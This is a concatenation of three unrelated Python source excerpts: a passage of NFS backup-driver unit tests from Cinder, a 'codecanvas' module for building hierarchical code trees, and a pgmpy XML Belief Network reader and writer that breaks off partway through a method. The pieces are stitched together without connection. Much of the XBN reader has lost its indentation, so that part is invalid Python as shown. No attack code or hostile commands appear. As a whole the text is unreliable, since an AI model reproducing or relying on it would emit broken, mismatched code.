        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        self.assertEqual(container_name, backup['container'])

    def test_backup_shafile(self):
        volume_id = '1eb6325f-6666-43a2-bcdd-0000001d8dac'

        def _fake_generate_object_name_prefix(self, backup):
            az = 'az_fake'
            backup_name = '%s_backup_%s' % (az, backup['id'])
            volume = 'volume_%s' % (backup['volume_id'])
            prefix = volume + '_' + backup_name
            return prefix

        # Substitute a deterministic object-name prefix.
        self.stubs.Set(nfs.NFSBackupDriver,
                       '_generate_object_name_prefix',
                       _fake_generate_object_name_prefix)
        container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
                                               '', 1)
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        self.assertEqual(container_name, backup['container'])
        # Verify sha contents
        content1 = service._read_sha256file(backup)
        self.assertEqual(32 * 1024 / content1['chunk_size'],
                         len(content1['sha256s']))

    def test_backup_cmp_shafiles(self):
        volume_id = '261e8c1a-0c07-41d7-923f-000000d3efb8'

        def _fake_generate_object_name_prefix(self, backup):
            az = 'az_fake'
            backup_name = '%s_backup_%s' % (az, backup['id'])
            volume = 'volume_%s' % (backup['volume_id'])
            prefix = volume + '_' + backup_name
            return prefix

        # Substitute a deterministic object-name prefix.
        self.stubs.Set(nfs.NFSBackupDriver,
                       '_generate_object_name_prefix',
                       _fake_generate_object_name_prefix)
        container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
                                               '', 1)
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        self.assertEqual(container_name, backup['container'])
        # Create incremental backup with no change to contents
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=124,
                                     parent_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        service.backup(deltabackup, self.volume_file)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        self.assertEqual(container_name, deltabackup['container'])
        # Compare shas from both files
        content1 = service._read_sha256file(backup)
        content2 = service._read_sha256file(deltabackup)
        self.assertEqual(len(content1['sha256s']), len(content2['sha256s']))
        self.assertEqual(set(content1['sha256s']), set(content2['sha256s']))

    def test_backup_delta_two_objects_change(self):
        volume_id = '3f400215-e346-406c-83b0-0000009ac4fa'

        def _fake_generate_object_name_prefix(self, backup):
            az = 'az_fake'
            backup_name = '%s_backup_%s' % (az, backup['id'])
            volume = 'volume_%s' % (backup['volume_id'])
            prefix = volume + '_' + backup_name
            return prefix

        # Substitute a deterministic object-name prefix.
        self.stubs.Set(nfs.NFSBackupDriver,
                       '_generate_object_name_prefix',
                       _fake_generate_object_name_prefix)
        self.flags(backup_file_size=(8 * 1024))
        self.flags(backup_sha_block_size_bytes=1024)
        container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
                                               '', 1)
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        self.assertEqual(container_name, backup['container'])
        # Change two 1KiB blocks, then create an incremental backup.
        self.volume_file.seek(16 * 1024)
        self.volume_file.write(os.urandom(1024))
        self.volume_file.seek(20 * 1024)
        self.volume_file.write(os.urandom(1024))
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=124,
                                     parent_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        service.backup(deltabackup, self.volume_file)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        self.assertEqual(container_name, deltabackup['container'])
        content1 = service._read_sha256file(backup)
        content2 = service._read_sha256file(deltabackup)
        # Verify that two shas are changed at index 16 and 20
        self.assertNotEqual(content1['sha256s'][16], content2['sha256s'][16])
        self.assertNotEqual(content1['sha256s'][20], content2['sha256s'][20])

    def test_backup_delta_two_blocks_in_object_change(self):
        volume_id = '5f3f810a-2ff3-4905-aaa3-0000005814ab'

        def _fake_generate_object_name_prefix(self, backup):
            az = 'az_fake'
            backup_name = '%s_backup_%s' % (az, backup['id'])
            volume = 'volume_%s' % (backup['volume_id'])
            prefix = volume + '_' + backup_name
            return prefix

        # Substitute a deterministic object-name prefix.
        self.stubs.Set(nfs.NFSBackupDriver,
                       '_generate_object_name_prefix',
                       _fake_generate_object_name_prefix)
        self.flags(backup_file_size=(8 * 1024))
        self.flags(backup_sha_block_size_bytes=1024)
        container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
                                               '', 1)
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        self.assertEqual(container_name, backup['container'])
        # Change two 1KiB blocks, then create an incremental backup.
        self.volume_file.seek(16 * 1024)
        self.volume_file.write(os.urandom(1024))
        self.volume_file.seek(20 * 1024)
        self.volume_file.write(os.urandom(1024))
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=124,
                                     parent_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        service.backup(deltabackup, self.volume_file)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        self.assertEqual(container_name, deltabackup['container'])
        # Verify that two shas are changed at index 16 and 20
        content1 = service._read_sha256file(backup)
        content2 = service._read_sha256file(deltabackup)
        self.assertNotEqual(content1['sha256s'][16], content2['sha256s'][16])
        self.assertNotEqual(content1['sha256s'][20], content2['sha256s'][20])

    def test_backup_backup_metadata_fail(self):
        """Test of when an exception occurs in backup().

        In backup(), after an exception occurs in
        self._backup_metadata(), we want to check the process of an
        exception handler.
        """
        volume_id = '26481bc2-fc85-40ae-8a4a-0000000b24e5'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='none')
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)

        def fake_backup_metadata(self, backup, object_meta):
            raise exception.BackupDriverException(message=_('fake'))

        # Raise a pseudo exception.BackupDriverException.
        self.stubs.Set(nfs.NFSBackupDriver, '_backup_metadata',
                       fake_backup_metadata)
        # We expect that an exception be notified directly.
        self.assertRaises(exception.BackupDriverException,
                          service.backup,
                          backup, self.volume_file)

    def test_backup_backup_metadata_fail2(self):
        """Test of when an exception occurs in an exception handler.

        In backup(), after an exception occurs in
        self._backup_metadata(), we want to check the process when the
        second exception occurs in self.delete().
        """
        volume_id = 'ce18dbc6-65d6-49ca-8866-000000b1c05b'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='none')
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)

        def fake_backup_metadata(self, backup, object_meta):
            raise exception.BackupDriverException(message=_('fake'))

        # Raise a pseudo exception.BackupDriverException.
        self.stubs.Set(nfs.NFSBackupDriver, '_backup_metadata',
                       fake_backup_metadata)

        def fake_delete(self, backup):
            raise exception.BackupOperationError()

        # Raise a pseudo exception.BackupOperationError.
        self.stubs.Set(nfs.NFSBackupDriver, 'delete', fake_delete)
        # We expect that the second exception is notified.
        self.assertRaises(exception.BackupOperationError,
                          service.backup,
                          backup, self.volume_file)

    def test_restore_uncompressed(self):
        volume_id = 'b6f39bd5-ad93-474b-8ee4-000000a0d11e'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='none')
        self.flags(backup_sha_block_size_bytes=32)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        with tempfile.NamedTemporaryFile() as restored_file:
            backup = objects.Backup.get_by_id(self.ctxt, 123)
            service.restore(backup, volume_id, restored_file)
            self.assertTrue(filecmp.cmp(self.volume_file.name,
                            restored_file.name))

    def test_restore_bz2(self):
        volume_id = '3d4f044e-dc78-49e1-891e-000000549431'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='bz2')
        self.flags(backup_file_size=(1024 * 3))
        self.flags(backup_sha_block_size_bytes=1024)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        with tempfile.NamedTemporaryFile() as restored_file:
            backup = objects.Backup.get_by_id(self.ctxt, 123)
            service.restore(backup, volume_id, restored_file)
            self.assertTrue(filecmp.cmp(self.volume_file.name,
                            restored_file.name))

    def test_restore_zlib(self):
        volume_id = 'ab84fe59-19a8-4c7d-9103-00000061488b'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='zlib')
        self.flags(backup_file_size=(1024 * 3))
        # PEP8 fix: no spaces around '=' in keyword arguments.
        self.flags(backup_sha_block_size_bytes=1024)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        with tempfile.NamedTemporaryFile() as restored_file:
            backup = objects.Backup.get_by_id(self.ctxt, 123)
            service.restore(backup, volume_id, restored_file)
            self.assertTrue(filecmp.cmp(self.volume_file.name,
                            restored_file.name))

    def test_restore_delta(self):
        volume_id = '486249dc-83c6-4a02-8d65-000000d819e7'

        def _fake_generate_object_name_prefix(self, backup):
            az = 'az_fake'
            backup_name = '%s_backup_%s' % (az, backup['id'])
            volume = 'volume_%s' % (backup['volume_id'])
            prefix = volume + '_' + backup_name
            return prefix

        # Substitute a deterministic object-name prefix.
        self.stubs.Set(nfs.NFSBackupDriver,
                       '_generate_object_name_prefix',
                       _fake_generate_object_name_prefix)
        # PEP8 fix: no space before '=' in keyword arguments.
        self.flags(backup_file_size=(1024 * 8))
        self.flags(backup_sha_block_size_bytes=1024)
        container_name = self.temp_dir.replace(tempfile.gettempdir() + '/',
                                               '', 1)
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=123)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        # Change two 1KiB blocks, then create an incremental backup.
        self.volume_file.seek(16 * 1024)
        self.volume_file.write(os.urandom(1024))
        self.volume_file.seek(20 * 1024)
        self.volume_file.write(os.urandom(1024))
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=container_name,
                                     backup_id=124,
                                     parent_id=123)
        self.volume_file.seek(0)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        service.backup(deltabackup, self.volume_file, True)
        deltabackup = objects.Backup.get_by_id(self.ctxt, 124)
        with tempfile.NamedTemporaryFile() as restored_file:
            backup = objects.Backup.get_by_id(self.ctxt, 124)
            service.restore(backup, volume_id,
                            restored_file)
            self.assertTrue(filecmp.cmp(self.volume_file.name,
                            restored_file.name))

    def test_delete(self):
        volume_id = '4b5c39f2-4428-473c-b85a-000000477eca'
        self._create_backup_db_entry(volume_id=volume_id)
        service = nfs.NFSBackupDriver(self.ctxt)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.delete(backup)

    def test_get_compressor(self):
        service = nfs.NFSBackupDriver(self.ctxt)
        compressor = service._get_compressor('None')
        self.assertIsNone(compressor)
        compressor = service._get_compressor('zlib')
        self.assertEqual(zlib, compressor)
        compressor = service._get_compressor('bz2')
        self.assertEqual(bz2, compressor)
        self.assertRaises(ValueError, service._get_compressor, 'fake')

    def test_prepare_output_data_effective_compression(self):
        service = nfs.NFSBackupDriver(self.ctxt)
        # Set up buffer of 128 zeroed bytes
        fake_data = buffer(bytearray(128))
        result = service._prepare_output_data(fake_data)
        self.assertEqual('zlib', result[0])
        # BUG FIX: the original asserted len(result) < len(fake_data), which
        # compares the length of the (algorithm, data) tuple -- always 2 --
        # and so always passed.  Compare the compressed payload instead.
        self.assertTrue(len(result[1]) < len(fake_data))

    def test_prepare_output_data_no_compresssion(self):
        self.flags(backup_compression_algorithm='none')
        service = nfs.NFSBackupDriver(self.ctxt)
        # Set up buffer of 128 zeroed bytes
        fake_data = buffer(bytearray(128))
        result = service._prepare_output_data(fake_data)
        self.assertEqual('none', result[0])
        self.assertEqual(fake_data, result[1])

    def test_prepare_output_data_ineffective_compression(self):
        service = nfs.NFSBackupDriver(self.ctxt)
        # Set up buffer of 128 zeroed bytes
        fake_data = buffer(bytearray(128))
        # Pre-compress so that compression in the driver will be ineffective.
        already_compressed_data = service.compressor.compress(fake_data)
        result = service._prepare_output_data(already_compressed_data)
        self.assertEqual('none', result[0])
        self.assertEqual(already_compressed_data, result[1])
| |
# codecanvas.py
# creates hierarchically accessible code-structures
# author: Christophe VG
# helper functions to wrap return values in a list or not
def maybe_list(codes):
  """Unwrap a sequence: None when empty, the element when single, else List."""
  count = len(codes)
  if count == 0: return None
  if count == 1: return codes[0]
  return List(codes)
def as_list(codes):
  """Normalise a maybe_list()-style value back into a plain python list.

  The branch order matters: plain lists short-circuit before the List
  (and tuple) checks are evaluated.
  """
  if codes is None:
    return []
  if isinstance(codes, list):
    return codes
  if isinstance(codes, List):
    return list(codes)
  if isinstance(codes, tuple):
    return codes[0].codes
  return [codes]
# the single code/node class
class Code(object):
  """A single node in a hierarchical code structure.

  Children live in three ordered groups: stuck to the top, floating in
  the middle and stuck to the bottom.  Tags allow selecting/finding.
  """
  def __init__(self, data=""):
    self.data = data
    self.stick_to = None                 # None, "top" or "bottom"
    self.tags = []                       # kept unique and sorted
    self.sticking = {"top": [], "bottom": []}
    self.floating = []
    self.bottom = []                     # NOTE(review): appears unused -- confirm
    self._parent = None

  def _children(self):
    # logical child order: top-stuck, floating, bottom-stuck
    return self.sticking["top"] + self.floating + self.sticking["bottom"]
  children = property(_children)

  def remove_child(self, index):
    """Remove the child at logical index; out-of-range is ignored."""
    # narrowed from a bare except: only swallow the expected IndexError
    try: self.update_child(index, None)
    except IndexError: pass

  def update_child(self, index, value):
    """Replace (or, with value=None, remove) the child at logical index."""
    if index < len(self.sticking["top"]):
      if value is None: self.sticking["top"].pop(index)
      else: self.sticking["top"][index] = value
      return
    index -= len(self.sticking["top"])
    if index < len(self.floating):
      if value is None: self.floating.pop(index)
      else: self.floating[index] = value
      return
    index -= len(self.floating)
    if index < len(self.sticking["bottom"]):
      if value is None: self.sticking["bottom"].pop(index)
      else: self.sticking["bottom"][index] = value
      return
    # py3-compatible raise (was the py2-only "raise IndexError, msg" form)
    raise IndexError("index " + str(index) + " is not within child range.")

  def _sticky(self):
    return self.stick_to is not None
  sticky = property(_sticky)

  def __str__(self):
    children = ""
    if len(self) > 0:
      for child in self:
        children += "\n" + \
                    "\n".join(["  " + line for line in str(child).split("\n")])
    tags = "" if len(self.tags) < 1 else " [" + ",".join(self.tags) + "]"
    sticky = "" if not self.sticky else " <sticky>"
    me = "" if self.__class__.__name__ == "Code" \
         else self.__class__.__name__ + " "
    return (me + str(self.data) + tags + sticky + children).lstrip().rstrip()

  def __iter__(self):
    # subclasses may forbid children (WithoutChildren raises); fall back
    # to an empty iteration in that case
    try:
      return iter(self.children)
    except Exception:
      return iter([])

  def __len__(self):
    return len(self.children)

  def __getitem__(self, index):
    return self.children[index]

  def stick_top(self):
    """Move this node into its parent's top-stuck group."""
    if self.stick_to == "top": return
    if self._parent:
      if self.sticky: self._parent.sticking["bottom"].remove(self)
      else: self._parent.floating.remove(self)
      self._parent.sticking["top"].append(self)
    self.stick_to = "top"
    return self

  def stick_bottom(self):
    """Move this node into its parent's bottom-stuck group."""
    if self.stick_to == "bottom": return
    if self._parent:
      if self.sticky: self._parent.sticking["top"].remove(self)
      else: self._parent.floating.remove(self)
      self._parent.sticking["bottom"].append(self)
    self.stick_to = "bottom"
    return self

  def unstick(self):
    """Return this node to its parent's floating group."""
    if not self.sticky: return
    if self._parent:
      self._parent.sticking[self.stick_to].remove(self)
      self._parent.floating.append(self)
    self.stick_to = None
    return self

  def tag(self, *tags):
    """Add tags; the tag list stays unique and sorted."""
    self.tags.extend(tags)
    self.tags = sorted(set(self.tags))
    return self

  def untag(self, *tags):
    """Remove the given tags."""
    # list comprehension instead of py2 filter() so the result is a
    # list on both python 2 and python 3
    self.tags = [t for t in self.tags if t not in tags]
    return self

  def append(self, *children):
    """Adopt children, honouring their stickiness."""
    for child in children:
      child._parent = self
      if child.sticky: self.sticking[child.stick_to].append(child)
      else: self.floating.append(child)
    return maybe_list(children)

  def contains(self, *children):
    """Like append(), but returns self for chaining."""
    self.append(*children)
    return self

  def _insert(self, relative, *siblings):
    # BUG FIX: the original raised with "self + '...'" which would itself
    # fail with TypeError (Code defines no __add__); use str(self) and the
    # py3-compatible raise syntax.
    if self._parent is None:
      raise RuntimeError(str(self) + " has no parent")
    if self.sticky:
      raise RuntimeError(str(self) + " is sticky, can't insert")
    index = self._parent.floating.index(self) + relative
    for sibling in siblings:
      if sibling.sticky:
        raise RuntimeError(str(sibling) + " is sticky, can't insert")
      sibling._parent = self._parent
      self._parent.floating.insert(index, sibling)
    return maybe_list(siblings)

  def insert_before(self, *siblings):
    for sibling in siblings:
      sibling._insert(0, self)
    return self

  def insert_after(self, *siblings):
    for sibling in siblings:
      sibling._insert(1, self)
    return self

  def select(self, *tags):
    """
    Selects children of which the chain up to them is marked with tags.
    """
    if len(tags) < 1: return None
    codes = []
    tag = tags[0]
    more = len(tags) > 1
    for child in self:
      if tag in child.tags or tag == "*":
        if more: codes.extend(as_list(child.select(*tags[1:])))
        else: codes.append(child)
    return maybe_list(codes)

  def find(self, *tags):
    """
    Finds codes that have tags.
    """
    tags = set(tags)
    codes = []
    class Finder(Visitor):
      def visit_all(self, code):
        if tags.issubset(code.tags): codes.append(code)
        if len(code) > 0:
          for child in code: child.accept(self)
    self.accept(Finder())
    return maybe_list(codes)

  def accept(self, visitor):
    """Visitor dispatch: visit_all first, then visit_<ClassName>."""
    # generic hook; missing handler is fine
    try: getattr(visitor, "visit_all")(self)
    except AttributeError: pass
    # class-specific hook; only swallow the "no such handler" error, not
    # AttributeErrors raised inside the handler itself
    name = "visit_" + self.__class__.__name__
    try: return getattr(visitor, name)(self)
    except AttributeError as e:            # py3-compatible (was ", e")
      expected = "'{0}' object has no attribute '{1}'".format(
        visitor.__class__.__name__, name)
      if str(e) != expected:
        # Whoops some other AttributeError ... while calling
        raise
    return None
# wrapper for multiple Codes, offering the same interface, dispatching to list
# of Codes and aggregating results
class List(Code):
  """Wraps several Codes, dispatching Code operations to each of them
  and aggregating the results."""
  def __init__(self, codes=None):
    # BUG FIX: the original used a mutable default argument (codes=[]),
    # which would be shared by every List created without arguments.
    self.codes = [] if codes is None else codes
  def _children(self): return self.codes
  children = property(_children)
  def __iter__(self):
    return iter(self.codes)
  def __len__(self):
    return len(self.codes)
  def __getitem__(self, index):
    return self.codes[index]
  def stick_top(self):
    for code in self.codes: code.stick_top()
    return self
  def stick_bottom(self):
    for code in self.codes: code.stick_bottom()
    return self
  def unstick(self):
    for code in self.codes: code.unstick()
    return self
  def tag(self, *tags):
    for code in self.codes: code.tag(*tags)
    return self
  def untag(self, *tags):
    for code in self.codes: code.untag(*tags)
    return self
  def append(self, *children):
    for code in self.codes: code.append(*children)
    return maybe_list(children)
  def insert_before(self, *siblings):
    siblings = as_list(siblings)
    for code in self.codes: code.insert_before(*siblings)
    return self
  # BUG FIX: insert_after was defined twice; the first definition (which
  # normalised siblings through as_list) was dead code, silently shadowed
  # by this one.  The effective definition is kept to preserve behavior;
  # NOTE(review): the asymmetry with insert_before may be unintended.
  def insert_after(self, *siblings):
    for code in self.codes: code.insert_after(*siblings)
    return self
  def contains(self, *children):
    for code in self.codes: code.contains(*children)
    return self
  def select(self, *tags):
    selected = []
    for code in self.codes: selected.extend(as_list(code.select(*tags)))
    return maybe_list(selected)
  def find(self, *tags):
    selected = []
    for code in self.codes: selected.extend(as_list(code.find(*tags)))
    return maybe_list(selected)
class Canvas(Code):
  """Root of a code tree; renders its children newline-separated."""
  def __str__(self):
    return "\n".join(str(child) for child in self)
class Visitor(object):
  """
  Base-class for CodeCanvas-Visitors

  All handlers are no-ops; subclasses override the hooks they care about.
  """
  def visit_all(self, code):
    return None
  def visit_Code(self, code):
    return None
  def visit_List(self, list):
    return None
# Code implementations to override default functionality
class WithoutChildModification(object):
  """Mixin that forbids adding or inserting children."""
  def append(self, *children):
    raise NotImplementedError
  def contains(self, *children):
    raise NotImplementedError
  def _insert(self, relative, *siblings):
    raise NotImplementedError
class WithoutChildren(WithoutChildModification):
  """Mixin for leaf nodes: accessing children is an error, length is 0."""
  def _children(self):
    raise NotImplementedError
  children = property(_children)
  def __len__(self):
    return 0
| |
import numpy as np
try:
from lxml import etree
except ImportError:
try:
import xml.etree.ElementTree as etree
except ImportError:
# try:
# import xml.etree.cElementTree as etree
# except ImportError:
# commented out as causing problem with dictionary attributes
print("Failed to import ElementTree from any known place")
from pgmpy.models import BayesianModel
from pgmpy.factors.discrete import TabularCPD
from pgmpy.extern.six.moves import map, range
class XBNReader(object):
"""
Base class for reading XML Belief Network File Format.
"""
def __init__(self, path=None, string=None):
"""
Initializer for XBNReader class.
Parameters
----------
path: str or file
Path of the file containing XBN data.
string: str
String of XBN data
Examples
--------
reader = XBNReader('test_XBN.xml')
Reference
---------
http://xml.coverpages.org/xbn-MSdefault19990414.html
"""
if path:
self.network = etree.parse(path).getroot()
elif string:
self.network = etree.fromstring(string)
else:
raise ValueError("Must specify either path or string")
self.bnmodel = self.network.find('BNMODEL')
self.analysisnotebook = self.get_analysisnotebook_values()
self.model_name = self.get_bnmodel_name()
self.static_properties = self.get_static_properties()
self.variables = self.get_variables()
self.edges = self.get_edges()
self.variable_CPD = self.get_distributions()
def get_analysisnotebook_values(self):
"""
Returns a dictionary of the attributes of ANALYSISNOTEBOOK tag
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_analysisnotebook_values()
{'NAME': "Notebook.Cancer Example From Neapolitan",
'ROOT': "Cancer"}
"""
return {key: value for key, value in self.network.items()}
def get_bnmodel_name(self):
"""
Returns the name of the BNMODEL.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_bnmodel_name()
'Cancer'
"""
return self.network.find('BNMODEL').get('NAME')
def get_static_properties(self):
"""
Returns a dictionary of STATICPROPERTIES
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_static_properties()
{'FORMAT': 'MSR DTAS XML', 'VERSION': '0.2', 'CREATOR': 'Microsoft Research DTAS'}
"""
return {tags.tag: tags.get('VALUE') for tags in self.bnmodel.find('STATICPROPERTIES')}
def get_variables(self):
"""
Returns a list of variables.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_variables()
{'a': {'TYPE': 'discrete', 'XPOS': '13495',
'YPOS': '10465', 'DESCRIPTION': '(a) Metastatic Cancer',
'STATES': ['Present', 'Absent']}
'b': {'TYPE': 'discrete', 'XPOS': '11290',
'YPOS': '11965', 'DESCRIPTION': '(b) Serum Calcium Increase',
'STATES': ['Present', 'Absent']},
'c': {....},
'd': {....},
'e': {....}
}
"""
variables = {}
for variable in self.bnmodel.find('VARIABLES'):
variables[variable.get('NAME')] = {'TYPE': variable.get('TYPE'),
'XPOS': variable.get('XPOS'),
'YPOS': variable.get('YPOS'),
'DESCRIPTION': variable.find('DESCRIPTION').text,
'STATES': [state.text for state in variable.findall('STATENAME')]}
return variables
def get_edges(self):
"""
Returns a list of tuples. Each tuple contains two elements (parent, child) for each edge.
Examples
--------
>>> reader = XBNReader('xbn_test.xml')
>>> reader.get_edges()
[('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd'), ('c', 'e')]
"""
return [(arc.get('PARENT'), arc.get('CHILD')) for arc in self.bnmodel.find('STRUCTURE')]
def get_distributions(self):
    """
    Returns a dictionary of name and its distribution. Distribution is a ndarray.

    The ndarray is stored in the standard way such that the rightmost variable
    changes most often. Consider a CPD of variable 'd' which has parents 'b' and
    'c' (distribution['CONDSET'] = ['b', 'c'])

              |  d_0     d_1
    ---------------------------
    b_0, c_0  |  0.8     0.2
    b_0, c_1  |  0.9     0.1
    b_1, c_0  |  0.7     0.3
    b_1, c_1  |  0.05    0.95

    The value of distribution['d']['DPIS'] for the above example will be:
    array([[ 0.8 , 0.2 ], [ 0.9 , 0.1 ], [ 0.7 , 0.3 ], [ 0.05, 0.95]])

    Examples
    --------
    >>> reader = XBNReader('xbn_test.xml')
    >>> reader.get_distributions()
    {'a': {'TYPE': 'discrete', 'DPIS': array([[ 0.2, 0.8]])},
     'e': {'TYPE': 'discrete', 'DPIS': array([[ 0.8, 0.2],
            [ 0.6, 0.4]]), 'CONDSET': ['c'], 'CARDINALITY': [2]},
     'b': {'TYPE': 'discrete', 'DPIS': array([[ 0.8, 0.2],
            [ 0.2, 0.8]]), 'CONDSET': ['a'], 'CARDINALITY': [2]},
     'c': {'TYPE': 'discrete', 'DPIS': array([[ 0.2 , 0.8 ],
            [ 0.05, 0.95]]), 'CONDSET': ['a'], 'CARDINALITY': [2]},
     'd': {'TYPE': 'discrete', 'DPIS': array([[ 0.8 , 0.2 ],
            [ 0.9 , 0.1 ],
            [ 0.7 , 0.3 ],
            [ 0.05, 0.95]]), 'CONDSET': ['b', 'c'], 'CARDINALITY': [2, 2]}}
    """
    distribution = {}
    # Each child of DISTRIBUTIONS is one DIST element describing a single CPD.
    for dist in self.bnmodel.find('DISTRIBUTIONS'):
        # The owning variable's name is stored on the PRIVATE sub-element.
        variable_name = dist.find('PRIVATE').get('NAME')
        distribution[variable_name] = {'TYPE': dist.get('TYPE')}
        # CONDSET is only present for variables that have parents.
        if dist.find('CONDSET') is not None:
            # Names of the conditioning (parent) variables, in document order.
            distribution[variable_name]['CONDSET'] = [var.get('NAME') for
                var in dist.find('CONDSET').findall('CONDELEM')]
            # Cardinality of parent i = number of distinct values appearing
            # in column i of the per-DPI INDEXES attributes.
            distribution[variable_name]['CARDINALITY'] = np.array(
                [len(set(np.array([list(map(int, dpi.get('INDEXES').split()))
                                   for dpi in dist.find('DPIS')])[:, i]))
                 for i in range(len(distribution[variable_name]['CONDSET']))])
        # One row per DPI element; each row holds the probabilities for one
        # parent configuration (rightmost variable changing fastest).
        distribution[variable_name]['DPIS'] = np.array(
            [list(map(float, dpi.text.split())) for dpi in dist.find('DPIS')])
    return distribution
def get_model(self):
    """
    Builds and returns a BayesianModel instance assembled from the parsed
    edges, variables and conditional probability distributions.
    """
    model = BayesianModel(self.edges)
    model.name = self.model_name

    # Convert every parsed distribution into a TabularCPD.
    cpds = []
    for variable, dist in self.variable_CPD.items():
        parents = dist.get('CONDSET', [])
        parent_cards = dist.get('CARDINALITY', [])
        n_states = len(self.variables[variable]['STATES'])
        cpds.append(TabularCPD(variable, n_states, dist['DPIS'],
                               evidence=parents,
                               evidence_card=parent_cards))
    model.add_cpds(*cpds)

    # Attach the remaining per-variable metadata to the graph nodes.
    for variable, properties in self.variables.items():
        model.node[variable] = properties
    return model
class XBNWriter(object):
    """
    Base class for writing XML Belief Network file format.
    """
    def __init__(self, model, encoding='utf-8', prettyprint=True):
        """
        Initializer for XBNWriter class

        Parameters
        ----------
        model: BayesianModel Instance
            Model to write
        encoding: str(optional)
            Encoding for the output data
        prettyprint: Bool(optional)
            Indentation in output XML if true

        Reference
        ---------
        http://xml.coverpages.org/xbn-MSdefault19990414.html

        Examples
        --------
        >>> writer = XBNWriter(model)
        """
        if not isinstance(model, BayesianModel):
            raise TypeError("Model must be an instance of Bayesian Model.")
        self.model = model
        self.encoding = encoding
        self.prettyprint = prettyprint
        # ANALYSISNOTEBOOK is the document root; BNMODEL holds the network.
        self.network = etree.Element('ANALYSISNOTEBOOK')
        self.bnmodel = etree.SubElement(self.network, 'BNMODEL')
        if self.model.name:
            etree.SubElement(self.bnmodel, 'NAME').text = self.model.name
        # Serialize variables, edges and CPDs into the XML tree up front so
        # that str(writer) already contains the full network.
        self.variables = self.set_variables(self.model.node)
        self.structure = self.set_edges(sorted(self.model.edges()))
        self.distribution = self.set_distributions()

    def __str__(self):
        """
        Return the XML as string.
        """
        if self.prettyprint:
            self.indent(self.network)
        return etree.tostring(self.network, encoding=self.encoding)

    def indent(self, elem, level=0):
        """
        Inplace prettyprint formatter.

        Recursively inserts newline/indentation text between elements so the
        serialized XML is human-readable.
        """
        # Newline plus the indentation prefix for children of this element.
        i = "\n" + level*"  "
        if len(elem):
            # Element has children: indent its text and each child's tail.
            if not elem.text or not elem.text.strip():
                elem.text = i + "  "
            if not elem.tail or not elem.tail.strip():
